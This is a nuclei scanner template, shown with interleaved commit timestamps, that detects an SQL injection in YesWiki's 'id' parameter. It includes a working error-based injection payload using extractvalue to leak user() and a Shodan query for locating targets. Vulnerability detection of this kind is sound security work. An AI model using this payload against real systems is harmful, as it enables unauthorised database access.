nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml

34 lines
791 B
YAML
Raw Normal View History

2022-08-08 21:11:34 +00:00
id: yeswiki-sql
info:
name: YesWiki - SQL Injection
author: arafatansari
2022-08-09 18:43:33 +00:00
severity: critical
2022-08-08 21:11:34 +00:00
description: |
YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL.
reference:
- https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/
metadata:
2022-08-09 06:32:17 +00:00
verified: true
2022-08-08 21:11:34 +00:00
shodan-query: http.html:"yeswiki"
tags: yeswiki,sqli,huntr
2022-08-09 06:32:17 +00:00
variables:
num: "999999999"
2022-08-08 21:11:34 +00:00
requests:
- method: GET
path:
2022-08-09 06:32:17 +00:00
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
2022-08-08 21:11:34 +00:00
matchers-condition: and
matchers:
2022-08-09 06:32:17 +00:00
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3f'
2022-08-08 21:11:34 +00:00
- type: status
status:
- 200